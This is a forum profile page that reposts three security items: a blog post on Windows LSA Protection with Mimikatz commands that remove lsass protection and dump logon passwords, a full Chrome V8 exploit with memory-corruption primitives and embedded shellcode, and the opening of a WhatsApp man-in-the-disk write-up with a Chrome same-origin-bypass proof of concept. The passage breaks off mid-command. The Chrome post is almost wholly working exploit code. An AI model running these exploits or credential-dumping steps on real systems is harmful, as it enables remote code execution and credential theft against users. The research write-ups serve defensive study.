Jump to content

Nytro

Administrators
  • Posts

    18664
  • Joined

  • Last visited

  • Days Won

    683

Everything posted by Nytro

  1. Do You Really Know About LSA Protection (RunAsPPL)? April 07, 2021 When it comes to protecting against credentials theft on Windows, enabling LSA Protection (a.k.a. RunAsPPL) on LSASS may be considered as the very first recommendation to implement. But do you really know what a PPL is? In this post, I want to cover some core concepts about Protected Processes and also prepare the ground for a follow-up article that will be released in the coming days. Introduction When you think about it, RunAsPPL for LSASS is a true quick win. It is very easy to configure as the only thing you have to do is add a simple value in the registry and reboot. Like any other protection though, it is not bulletproof and it is not sufficient on its own, but it is still particularly efficient. Attackers will have to use some relatively advanced tricks if they want to work around it, which ultimately increases their chance of being detected. Therefore, as a security consultant, this is one of the top recommendations I usually give to a client. However, from a client’s perspective, I noticed that this protection tends to be confused with Credential Guard, which is completely different. I think that this confusion comes from the fact that the latter seems to provide a more robust mechanism although Credential Guard and LSA Protection are actually complementary. But of course, as a consultant, you have to explain these concepts if you want to convince a client that they should implement both recommendations. Some time ago, I had to give such explanation so, without going into too much detail, I think I said something like this about LSA Protection: “only a digitally signed binary can access a protected process”. You probably noticed that this sentence does not make much sense. This is how I realized that I didn’t really know how Protected Processes worked. So, I did some research and I found some really interesting things along the way, hence why I wanted to write about it. Disclaimer – Most of the concepts I discuss in this post are already covered by the official documentation and the book Windows Internals 7th edition (Part 1), which were my two main sources of information. The objective of this blog post is not to paraphrase them but rather gather the information which I think is the most valuable from a security consultant’s perspective. How to Enable LSA Protection (RunAsPPL) As mentioned previously, RunAsPPL is very easy to enable. The procedure is detailed in the official documentation and has also been covered in many blog posts before. If you want to enable it within a corporate environment, you should follow the procedure provided by Microsoft and create a Group Policy: Configuring Additional LSA Protection. But if you just want to enable it manually on a single machine, you just have to: open the Registry Editor (regedit.exe) as an Administrator; open the key HKLM\SYSTEM\CurrentControlSet\Control\Lsa; add the DWORD value RunAsPPL and set it to 1; reboot. That’s it! You are done! Before applying this setting throughout an entire corporate environment, there are two particular cases to consider though. They are both described in the official documentation. If the answer to at least one of the two following questions is “yes” then you need to take some precautions. Do you use any third-party authentication module? Do you use UEFI and/or Secure Boot? Third-party authentication module – If a third-party authentication module is required, such as in the case of a Smart Card Reader for example, you should make sure that they meet the requirements that are listed here: Protected process requirements for plug-ins or drivers. Basically, the module must be digitally signed with a Microsoft signature and it must comply with the Microsoft Security Development Lifecycle (SDL). The documentation also contains some instructions on how to set up an Audit Policy prior to the rollout phase to determine whether such module would be blocked if RunAsPPL were enabled. Secure Boot – If Secure Boot is enabled, which is usually the case with modern laptops for example, there is one important thing to be aware of. When RunAsPPL is enabled, the setting is stored in the firmware, in a UEFI variable. This means that, once the registry key is set and the machine has rebooted, deleting the newly added registry value will have no effect and RunAsPPL will remain enabled. If you want to disable the protection, you have to follow the procedure provided by Microsoft here: To disable LSA protection. You Shall Not Pass! By now, I assume you all know that RunAsPPL is an effective protection against tools such as Mimikatz (more about that in the next parts) or ProcDump from the Windows Sysinternals tools suite for example. An output such as the one below should therefore look familiar. This screenshot shows several important things: the current user is a member of the default Administrators group; the current user has SeDebugPrivilege (although it is currently disabled); the command privilege::debug in Mimikatz successfully enabled SeDebugPrivilege; the command sekurlsa::logonpasswords failed with the error code 0x00000005. So, despite all the privileges the current user has, the command failed. To understand why, we should take a look at the kuhl_m_sekurlsa_acquireLSA() function in mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c. Here is a simplified version of the code that shows only the part we are interested in. HANDLE hData = NULL; DWORD pid; DWORD processRights = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION; kull_m_process_getProcessIdForName(L"lsass.exe", &pid); hData = OpenProcess(processRights, FALSE, pid); if (hData && hData != INVALID_HANDLE_VALUE) { // if OpenProcess OK } else { PRINT_ERROR_AUTO(L"Handle on memory"); } In this code snippet, PRINT_ERROR_AUTO is a macro that basically prints the name of the function which failed along with the error code. The error code itself is retrieved by invoking GetLastError(). For those of you who are not familiar with the way the Windows API works, you just have to know that SetLastError() and GetLastError() are two Win32 functions that allow you to set and get the last standard error code. The first 500 codes are listed here: System Error Codes (0-499). Apart from that, the rest of the code is pretty straightforward. It first gets the PID of the process called lsass.exe and then, it tries to open it (i.e. get a process handle) with the flags PROCESS_VM_READ and PROCESS_QUERY_INFORMATION by invoking the Win32 function OpenProcess. What we can see on the previous screenshot is that this function failed with the error code 0x00000005, which simply means “Access is denied”. This confirms that, once RunAsPPL is enabled, even an administrator with SeDebugPrivilege cannot open LSASS with the required access flags. All the things I have explained so far can be considered common knowledge as they have been discussed in many other blog posts or pentest cheat sheets before. But I had to do this recap to make sure we are all on the same page and also to introduce the following parts. Bypassing RunAsPPL with Currently Known Techniques At the time of writing this blog post, there are three main known techniques for bypassing RunAsPPL and accessing the memory of lsass.exe (or any other PPL in general). Once again, this has already been discussed in other blog posts, so I will try to keep this short. Technique 1 – The Revenge of the Kiwi In the previous part, I stated that RunAsPPL effectively prevented Mimikatz from accessing the memory of lsass.exe, but this tool is actually also the most commonly known technique for bypassing it. To do so, Mimikatz uses a digitally signed driver to remove the protection flag of the Process object in the Kernel. The file mimidrv.sys must be located in the current folder in order to be loaded as a Kernel driver service using the command !+. Then, you can use the command !processprotect to remove the protection and finally access lsass.exe. mimikatz # !+ mimikatz # !processprotect /process:lsass.exe /remove mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords Once you are done, you can even “restore” the protection using the same command, but without the /remove argument and finally unload the driver with !-. mimikatz # !processprotect /process:lsass.exe mimikatz # !- There is one thing to be aware of if you do that though! You have to know that Mimikatz does not restore the protection level to its original level. The two screenshots below show the protection level of the lsass.exe process before and after issuing the command !processprotect /process:lsass.exe. As you can see, when RunAsPPL is enabled, the protection level is PsProtectedSignerLsa-Light whereas it is PsProtectedSignerWinTcb after the protection was restored by Mimikatz. In a way, this renders the system even more secure than it was as you will see in the next part but it could also have some undesired side effects. Technique 2 – Bring You Own Driver The major drawback of the previous method is that it can be easily detected by an antivirus. Even if you are able to execute Mimikatz in-memory for example, you still have to copy mimidrv.sys onto the target. At this point, you could consider compiling a custom version of the driver to evade signature-based detection, but this will also break the digital signature of the file. So, unless you are willing to pay a few hundred dollars to get your new driver signed, this will not do. If you don’t want to go through the official signing process, there is a clever trick you can use. This trick consists in loading an official and vulnerable driver that can be exploited to run arbitrary code in the Kernel. Once the driver is loaded it can be exploited from User-land to load an unsigned driver for example. This technique is implemented in gdrv-loader and PPLKiller for instance. Technique 3 – Python & Katz The last two techniques both rely on the use of a driver to execute arbitrary code in the Kernel and disable the Process protection. Such technique is still very dangerous, make one mistake and you trigger a BSOD. More recently though, SkelSec presented an alternative method for accessing lsass.exe. In an article entitled Duping AV with handles, he presented a way to bypass AV detection/blocking access to LSASS process. If you want to access LSASS’ memory, the first thing you have to do is invoke OpenProcess to get a handle with the appropriate rights on the Process object. Therefore, some AV software may block such attempt, thus effectively killing the attack in its early stage. The idea behind the technique described by SkelSec is simple: simply do not invoke OpenProcess. But how do you get the initial handle then? The answer came from the following observation. Sometimes, other processes, such as in the case of Antivirus software, already have an opened handle on the LSASS process in their memory space. So, as an administrator with debug privileges, you could copy this handle into you own process and then use it to access LSASS. It turns out this technique serves another purpose. It can also be used to bypass RunAsPPL because some unprotected processes may have obtained a handle on the LSASS process by another mean, using a driver for instance. In which case you can use pypykatz with the following command. pypykatz live lsa --method handledup On some occasions, this method worked perfectly fine for me but it is still a bit random. The chance of success highly depends on the target environment, which explains why I was not able to reproduce it on my lab machine. What are PPL Processes? Here comes the interesting part. In the previous paragraphs, I intentionally glossed over some key concepts. I chose to present all the things that are commonly known first so I can explain them into more detail here. A Long Time Ago in a Galaxy Far, Far Away… OK, it was not that long ago and it was not that far away either. But still, the history behind PPLs is quite interesting and definitely worth mentioning. First things first, PPL means Protected Process Light but, before that, there were just Protected Processes. The concept of Protected Process was introduced with Windows Vista / Server 2008 and its objective was not to protect your data or your credentials. Its initial objective was to protect media content and comply with DRM (Digital Rights Management) requirements. Microsoft developed this mechanism so that your media player could read a Blu-ray for instance, while preventing you from copying its content. At the time, the requirement was that the image file (i.e. the executable file) had to be digitally signed with a special Windows Media Certificate (as explained in the “Protected Processes” part of Windows Internals). In practice, a Protected Process can be accessed by an unprotected process only with very limited privileges: PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_SET_LIMITED_INFORMATION, PROCESS_TERMINATE and PROCESS_SUSPEND_RESUME. This set can even be reduced for some highly-sensitive processes. A few years later, starting with Windows 8.1 / Server 2012 R2, Microsoft introduced the concept of Protected Process Light. PPL is actually an extension of the previous Protected Process model and adds the concept of “Protection level”, which basically means that some PP(L) processes can be more protected than others. Protection Levels The protection level of a process was added to the EPROCESS kernel structure and is more specifically stored in its Protection member. This Protection member is a PS_PROTECTION structure and is documented here. typedef struct _PS_PROTECTION { union { UCHAR Level; struct { UCHAR Type : 3; UCHAR Audit : 1; // Reserved UCHAR Signer : 4; }; }; } PS_PROTECTION, *PPS_PROTECTION; Although it is represented as a structure, all the information is stored in the two nibbles of a single byte (Level is a UCHAR, i.e. an unsigned char). The first 3 bits represent the protection Type (see PS_PROTECTED_TYPE below). It defines whether the process is a PP or a PPL. The last 4 bits represent the Signer type (see PS_PROTECTED_SIGNER below), i.e. the actual level of protection. typedef enum _PS_PROTECTED_TYPE { PsProtectedTypeNone = 0, PsProtectedTypeProtectedLight = 1, PsProtectedTypeProtected = 2 } PS_PROTECTED_TYPE, *PPS_PROTECTED_TYPE; typedef enum _PS_PROTECTED_SIGNER { PsProtectedSignerNone = 0, // 0 PsProtectedSignerAuthenticode, // 1 PsProtectedSignerCodeGen, // 2 PsProtectedSignerAntimalware, // 3 PsProtectedSignerLsa, // 4 PsProtectedSignerWindows, // 5 PsProtectedSignerWinTcb, // 6 PsProtectedSignerWinSystem, // 7 PsProtectedSignerApp, // 8 PsProtectedSignerMax // 9 } PS_PROTECTED_SIGNER, *PPS_PROTECTED_SIGNER; As you probably guessed, a process’ protection level is defined by a combination of these two values. The below table lists the most common combinations. Protection level Value Signer Type PS_PROTECTED_SYSTEM 0x72 WinSystem (7) Protected (2) PS_PROTECTED_WINTCB 0x62 WinTcb (6) Protected (2) PS_PROTECTED_WINDOWS 0x52 Windows (5) Protected (2) PS_PROTECTED_AUTHENTICODE 0x12 Authenticode (1) Protected (2) PS_PROTECTED_WINTCB_LIGHT 0x61 WinTcb (6) Protected Light (1) PS_PROTECTED_WINDOWS_LIGHT 0x51 Windows (5) Protected Light (1) PS_PROTECTED_LSA_LIGHT 0x41 Lsa (4) Protected Light (1) PS_PROTECTED_ANTIMALWARE_LIGHT 0x31 Antimalware (3) Protected Light (1) PS_PROTECTED_AUTHENTICODE_LIGHT 0x11 Authenticode (1) Protected Light (1) Signer Types In the early days of Protected Processes, the protection level was binary, either a process was protected or it was not. We saw that this changed when PPL were introduced with Windows NT 6.3. Both PP and PPL now have a protection level which is determined by a signer level as described previously. Therefore, another interesting thing to know is how the signer type and the protection level are determined. The answer to this question is quite simple. Although there are some exceptions, the signer level is most commonly determined by a special field in the file’s digital certificate: Enhanced Key Usage (EKU). On this screenshot, you can see two examples, wininit.exe on the left and SgrmBroker.exe on the right. In both cases, we can see that the EKU field contains the OID that represents the Windows TCB Component signer type. The second highlighted OID represents the protection level, which is Protected Process Light in the case of wininit.exe and Protected Process in the case of SgrmBroker.exe. As a result, we know that the latter can be executed as a PP whereas the former can only be executed as a PPL. However, they will both have the WinTcb level. Protection Precedence The last key aspect that needs to be discussed is the Protection Precedence. In the “Protected Process Light (PPL) part of Windows Internals 7th Edition Part 1, you can read the following: When interpreting the power of a process, keep in mind that first, protected processes always trump PPLs, and that next, higher-value signer processes have access to lower ones, but not vice versa. In other words: a PP can open a PP or a PPL with full access, as long as its signer level is greater or equal; a PPL can open another PPL with full access, as long as its signer level is greater or equal; a PPL cannot open a PP with full access, regardless of its signer level. Note: it goes without saying that the ACL checks still apply. Being a Protected Process does not grant you super powers. If you are running a protected process as a low privileged user, you will not be able to magically access other users’ processes. It’s an additional protection. To illustrate this, I picked 3 easily identifiable processes / image files: wininit.exe – Session 0 initilization lsass.exe – LSASS process MsMpEng.exe – Windows Defender service Pr. Process Type Signer Level 1 wininit.exe Protected Light WinTcb PsProtectedSignerWinTcb-Light 2 lsass.exe Protected Light Lsa PsProtectedSignerLsa-Light 3 MsMpEng.exe Protected Light Antimalware PsProtectedSignerAntimalware-Light These 3 PPLs are running as NT AUTHORITY\SYSTEM with SeDebugPrivilege so user rights are not a concern in this example. This all comes down to the protection level. As wininit.exe has the signer type WinTcb, which is the highest possible value for a PPL, it could access the two other processes. Then, lsass.exe could access MsMpEng.exe as the signer level Lsa is higher than Antimalware. Finally, MsMpEng.exe can access none of the two other processes because it has the lowest level. Conclusion In the end, the concept of Protected Process (Light) remains a Userland protection. It was designed to prevent normal applications, even with administrator privileges, from accessing protected processes. This explains why most common techniques for bypassing such protection require the use of a driver. If you are able to execute arbitrary code in the Kernel, you can do (almost) whatever you want and you could well completely disable the protection of any Protected Process. Of course, this has become a bit more complicated over the years as you are now required to load a digitally signed driver, but this restriction can be worked around as we saw. In this post, we also saw that this concept has evolved from a basic unprotected/protected model to a hierarchical model, in which some processes can be more protected than others. In particular, we saw that “LSASS” has its own protection level – PsProtectedSignerLsa-Light. This means that a process with a higher protection level (e.g.: “WININIT”), would still be able to open it with full access. There is one aspect of PP/PPL that I did not mention though. The “L” in “PPL” is here for a reason. Indeed, with the concept of Protected Process Light, the overall security model was partially loosened, which opens some doors for Userland exploits. In the coming days, I will release the second part of this post to discuss one of these techniques. This will also be accompanied by the release of a new tool – PPLdump. As its name implies, this tool provides the ability for a local administrator to dump the memory of any PPL process, using only Userland tricks. Lastly, I would like to mention that this Research & Development work was partly done in the context of my job at SCRT. So, the next part will be published on their blog, but I’ll keep you posted on Twitter. The best is yet to come, so stay tuned! Links & Resources Microsoft - How to configure additional LSA protection of credentials https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection Windows Internals 7th edition (Part 1) https://docs.microsoft.com/en-us/sysinternals/resources/windows-internals Sursa: https://itm4n.github.io/lsass-runasppl/
  2. Nytro

    Chrome 0day

    /* BSD 2-Clause License Copyright (c) 2021, rajvardhan agarwal All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) var wasm_mod = new WebAssembly.Module(wasm_code); var wasm_instance = new WebAssembly.Instance(wasm_mod); var f = wasm_instance.exports.main; var buf = new ArrayBuffer(8); var f64_buf = new Float64Array(buf); var u64_buf = new Uint32Array(buf); let buf2 = new ArrayBuffer(0x150); function ftoi(val) { f64_buf[0] = val; return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); } function itof(val) { u64_buf[0] = Number(val & 0xffffffffn); u64_buf[1] = Number(val >> 32n); return f64_buf[0]; } const _arr = new Uint32Array([2**31]); function foo(a) { var x = 1; x = (_arr[0] ^ 0) + 1; x = Math.abs(x); x -= 2147483647; x = Math.max(x, 0); x -= 1; if(x==-1) x = 0; var arr = new Array(x); arr.shift(); var cor = [1.1, 1.2, 1.3]; return [arr, cor]; } for(var i=0;i<0x3000;++i) foo(true); var x = foo(false); var arr = x[0]; var cor = x[1]; const idx = 6; arr[idx+10] = 0x4242; function addrof(k) { arr[idx+1] = k; return ftoi(cor[0]) & 0xffffffffn; } function fakeobj(k) { cor[0] = itof(k); return arr[idx+1]; } var float_array_map = ftoi(cor[3]); var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]; var fake = fakeobj(addrof(arr2) + 0x20n); function arbread(addr) { if (addr % 2n == 0) { addr += 1n; } arr2[1] = itof((2n << 32n) + addr - 8n); return (fake[0]); } function arbwrite(addr, val) { if (addr % 2n == 0) { addr += 1n; } arr2[1] = itof((2n << 32n) + addr - 8n); fake[0] = itof(BigInt(val)); } function copy_shellcode(addr, shellcode) { let dataview = new DataView(buf2); let buf_addr = addrof(buf2); let backing_store_addr = buf_addr + 0x14n; arbwrite(backing_store_addr, addr); for (let i = 0; i < shellcode.length; i++) { dataview.setUint32(4*i, shellcode[i], true); } } var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16)); var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; copy_shellcode(rwx_page_addr, shellcode); f(); Sursa: https://github.com/r4j0x00/exploits/tree/master/chrome-0day
  3. Remote exploitation of a man-in-the-disk vulnerability in WhatsApp (CVE-2021-24027) CENSUS has been investigating for some time now the exploitation potential of Man-in-the-Disk (MitD) [01] vulnerabilities in Android. Recently, CENSUS identified two such vulnerabilities in the popular WhatsApp messenger app for Android [34]. The first of these was possibly independently reported to Facebook and was found to be patched in recent versions, while the second one was communicated by CENSUS to Facebook and was tracked as CVE-2021-24027 [33]. As both vulnerabilities have now been patched, we would like to share our discoveries regarding the exploitation potential of such vulnerabilities with the rest of the community. In this article we will have a look at how a simple phishing attack through an Android messaging application could result in the direct leakage of data found in External Storage (/sdcard). Then we will show how the two aforementioned WhatsApp vulnerabilities would have made it possible for attackers to remotely collect TLS cryptographic material for TLS 1.3 and TLS 1.2 sessions. With the TLS secrets at hand, we will demonstrate how a man-in-the-middle (MitM) attack can lead to the compromise of WhatsApp communications, to remote code execution on the victim device and to the extraction of Noise [05] protocol keys used for end-to-end encryption in user communications. Android 10 introduced the scoped storage feature [13], as a proactive defense against these types of attacks. With scoped storage, apps get by default access only to their own content on External Storage. Apps bearing a certain permission [36] can also access content shared by other applications. Finally, full access to External Storage is only granted to special purpose apps (e.g. file managers) that have been audited by Google. Android 11 is the first version to fully enforce the scoped storage rules on all apps, while Android 10 included a permissive mode of operation to provide developers with the needed time to transition to the new file access scheme. The techniques presented in this article apply to mobile devices running Android versions up to and including Android 9. It is possible to perform similar attacks using file-based access in Android 10, but we have not included these for reasons of brevity. Even without Android 10 in the picture, the number of affected devices remains quite large. Appbrain statistics [35] hint that devices running Android up to and including version 9 may very well constitute a 60% of all devices running Android today. In the past, state sponsored actors have used messaging applications to infiltrate activist groups [06] or even to attack individuals [07] and so seemingly innocent interactions in such applications may indeed be part of targeted phishing attacks. More importantly, vulnerabilities that enable adversaries to perform man-in-the-middle attacks can be abused for mass surveillance purposes. CENSUS has no knowledge on whether the attacks described in this article have indeed been used in the wild. WhatsApp users are strongly recommended to upgrade to version 2.21.4.18 or better. Keeping system components updated, such as the Chrome browser and the Android Operating System, is also key to the establishment of a proactive defense against man-in-the-disk vulnerabilities. Note: All WhatsApp code snippets presented in this text correspond to decompiled Java code recovered from an older version of WhatsApp (2.19.355) using jadx [08]. Most classes and variables have been renamed to reflect their semantics. Original minified class names are also provided where possible. Here are some quick links to help you navigate through this blog post: The Android Media Store Content Provider The Chrome CVE-2020-6516 Same-Origin-Policy bypass Session Resumption and Pre-Shared Keys in TLS 1.3 Session Resumption and the Master Secret in TLS 1.2 The WhatsApp TLS Man-in-the-disk Vulnerabilities From TLS secrets collection to Remote Code Execution Stealing the victim's Noise protocol key pair Conclusion and Future Work The Android Media Store Content Provider When a user clicks on a picture message, WhatsApp needs to call an external application to view the file. However, the external application might not have access to WhatsApp's internal storage. Indeed, one cannot make any assumptions on the whereabouts of this picture file on the filesystem or its permissions. So, in the picture case, there must be a way for the photo viewer to locate, read and display media files belonging to WhatsApp. Enter the concept of Content Providers [09], an IPC mechanism by which one application (e.g. WhatsApp) can share resources with any other application (e.g. Google Photos). Content providers are an interesting technology and a powerful tool in the hands of Android developers. There are plenty of content providers on an Android system; some exported by third-party applications, others exported by the Android framework itself. For example, a modern Android device comes with content providers that expose SMS and MMS information, telephony logs, browser bookmarks, downloaded files and so on. Of course, content providers also come with a means of controlling access to their resources (e.g. see exported, permission and grantUriPermissions [10]). Despite the various pitfalls and past CVE-less issues [11], these security controls generally work well. However, there are certain content providers which can be freely accessed by any application by design. The Media Store is one such example. It exports a content provider which indexes and manages all files under /sdcard. Using the Media Store, applications can read and write files in external storage, without relying on absolute filesystem paths. The Android developer documentation emphasizes that the content provider of Media Store is the preferred way of accessing external storage files in application code. To experiment with content providers, one can use the content command on Android devices. Root access is not necessarily required. For example, to see the list of files managed by the Media Store, one can execute the following command: $ content query --uri content://media/external/file To make the output more human friendly, one can limit the displayed columns to the identifier and path of each indexed file. $ content query --uri content://media/external/file --projection _id,_data Media providers exist in their own private namespace. As illustrated in the example above, to access a content provider the corresponding content:// URI should be specified. Generally, information on the paths, via which a provider can be accessed, can be recovered by looking at application manifests (in case the content provider is exported by an application) or the source code of the Android framework. Interestingly, on Android devices Chrome supports accessing content providers via the content:// scheme. This feature allows the browser to access resources (e.g. photos, documents etc.) exported by third party applications. To verify this, one can insert a custom entry in the Media Store and then access it using the browser: $ cd /sdcard $ echo "Hello, world!" > test.txt $ content insert --uri content://media/external/file \ --bind _data:s:/storage/emulated/0/test.txt \ --bind mime_type:s:text/plain To discover the identifier of the newly inserted file: $ content query --uri content://media/external/file \ --projection _id,_data | grep test.txt Row: 283 _id=747, _data=/storage/emulated/0/test.txt And to actually view the file in Chrome, one can use a URL like the one shown in the following picture. Notice the file identifier 747 (discovered above) which is used as a suffix in the URL. As this article focuses on WhatsApp, it would be interesting to see the list of related files indexed by the Media Store. The following output was collected from a Pixel 3a device after using WhatsApp for a few days. $ content query --uri content://media/external/file --projection _id,_data | grep -i whatsapp ... Row: 82 _id=58, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache Row: 83 _id=705, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/157.240.9.53.443 Row: 84 _id=239, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/crashlogs.whatsapp.net.443 Row: 85 _id=240, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/pps.whatsapp.net.443 Row: 86 _id=90, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/static.whatsapp.net.443 Row: 87 _id=706, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/v.whatsapp.net.443 Row: 88 _id=89, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/www.whatsapp.com.443 ... Row: 90 _id=57, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/watls-sessions Row: 91 _id=704, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/watls-sessions/bW1nLndoYXRzYXBwLm5ldCM0NDMjVExTX0FFU18xMjhfR0NNX1NIQTI1Ng== Row: 92 _id=743, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/watls-sessions/bWVkaWEtYW10Mi0xLmNkbi53aGF0c2FwcC5uZXQjNDQzI1RMU19BRVNfMTI4X0dDTV9TSEEyNTY= Row: 93 _id=744, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/watls-sessions/bWVkaWEuZmF0aDQtMi5mbmEud2hhdHNhcHAubmV0IzQ0MyNUTFNfQUVTXzEyOF9HQ01fU0hBMjU2 ... Row: 291 _id=206, _data=/storage/emulated/0/WhatsApp/Backups Row: 292 _id=252, _data=/storage/emulated/0/WhatsApp/Backups/chatsettingsbackup.db.crypt1 Row: 293 _id=253, _data=/storage/emulated/0/WhatsApp/Backups/statusranking.db.crypt1 Row: 294 _id=251, _data=/storage/emulated/0/WhatsApp/Backups/stickers.db.crypt1 Row: 295 _id=204, _data=/storage/emulated/0/WhatsApp/Databases Row: 296 _id=708, _data=/storage/emulated/0/WhatsApp/Databases/msgstore-2020-10-07.1.db.crypt12 Row: 297 _id=709, _data=/storage/emulated/0/WhatsApp/Databases/msgstore-2020-10-08.1.db.crypt12 Row: 298 _id=746, _data=/storage/emulated/0/WhatsApp/Databases/msgstore-2020-10-09.1.db.crypt12 Row: 299 _id=243, _data=/storage/emulated/0/WhatsApp/Databases/msgstore.db.crypt12 ... Row: 319 _id=528, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images Row: 320 _id=721, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0013.jpeg Row: 321 _id=722, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0015.jpeg Row: 322 _id=724, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0018.jpeg Row: 323 _id=733, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0029.jpeg Row: 324 _id=734, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0032.jpeg Row: 325 _id=735, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0035.jpeg ... Apart from the last few lines, where paths to various image files are shown, there are plenty of interesting entries in the above listing. Backups, databases, and the more suspicious-looking SSLSessionCache and watls-sessions. For the uninitiated, /storage/emulated/0 is a synonym for /sdcard, i.e. the external storage path. Apps bearing the READ_EXTERNAL_STORAGE permission may obtain access to any file stored in external storage in Android 9 and previous Android versions. It is also essential to note that file identifiers like 323, 324 and 325 shown above, are just sequential integers which can be guessed or even bruteforced. On a typical Android device, these identifiers usually fall within the range of tenths of thousands. The Chrome CVE-2020-6516 Same-Origin-Policy bypass The Same Origin Policy (SOP) [12] in browsers dictates that Javascript content of URL A will only be able to access content at URL B if the following URL attributes remain the same for A and B: The protocol e.g. https vs. http The domain e.g. www.example1.com vs. www.example2.com The port e.g. www.example1.com:8080 vs. www.example1.com:8443 Of course, there are exceptions to the above rules, but in general, a resource from https://www.example1.com (e.g. a piece of Javascript code) cannot access the DOM of a resource on https://www.example2.com, as this would introduce serious information leaks. Unless a Cross-Origin-Resource-Sharing (CORS) policy explicitly allows so, it shouldn't be possible for a web resource to bypass the SOP rules. It's essential to note that Chrome considers content:// to be a local scheme, just like file://. In this case SOP rules are even more strict, as each local scheme URL is considered a separate origin. For example, Javascript code in file:///tmp/test.html should not be able to access the contents of file:///tmp/test2.html, or any other file on the filesystem for that matter. Consequently, according to SOP rules, a resource loaded via content:// should not be able access any other content:// resource. Well, vulnerability CVE-2020-6516 of Chrome created an "exception" to this rule. CVE-2020-6516 [03] is a SOP bypass on resources loaded via a content:// URL. For example, Javascript code, running from within the context of an HTML document loaded from content://com.example.provider/test.html, can load and access any other resource loaded via a content:// URL. This is a serious vulnerability, especially on devices running Android 9 or previous versions of Android. On these devices scoped storage [13] is not implemented and, consequently, application-specific data under /sdcard, and more interestingly under /sdcard/Android, can be accessed via the system's Media Store content provider. A proof-of-concept is pretty straightforward. An HTML document that uses XMLHttpRequest to access arbitrary content:// URLs is uploaded under /sdcard. It is then added in the Media Store and rendered in Chrome, in a fashion similar to the example shown earlier. For demonstration purposes, one can attempt to load content://media/external/file/747 which is, in fact, the Media Store URL of the "Hello, world!" example. Surprisingly, the Javascript code, running within the origin of the HTML document, will fetch and display the contents of test.txt. <html> <head> <title>PoC</title> <script type="text/javascript"> function poc() { var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if(this.readyState == 4) { if(this.status == 200 || this.status == 0) { alert(xhr.response); } } } xhr.open("GET", "content://media/external/file/747"); xhr.send(); } </script> </head> <body onload="poc()"></body> </html> To see this in action, upload the HTML document, shown above, on the device under /sdcard/test.html. Then insert it in the Media Store's database: $ content insert --uri content://media/external/file \ --bind _data:s:/storage/emulated/0/test.html \ --bind mime_type:s:text/html To read the identifier of the newly inserted file, execute the following command. In this example, test.html's _id is 617. $ content query --uri content://media/external/file \ --projection _id,_data | grep test.html Row: 312 _id=617, 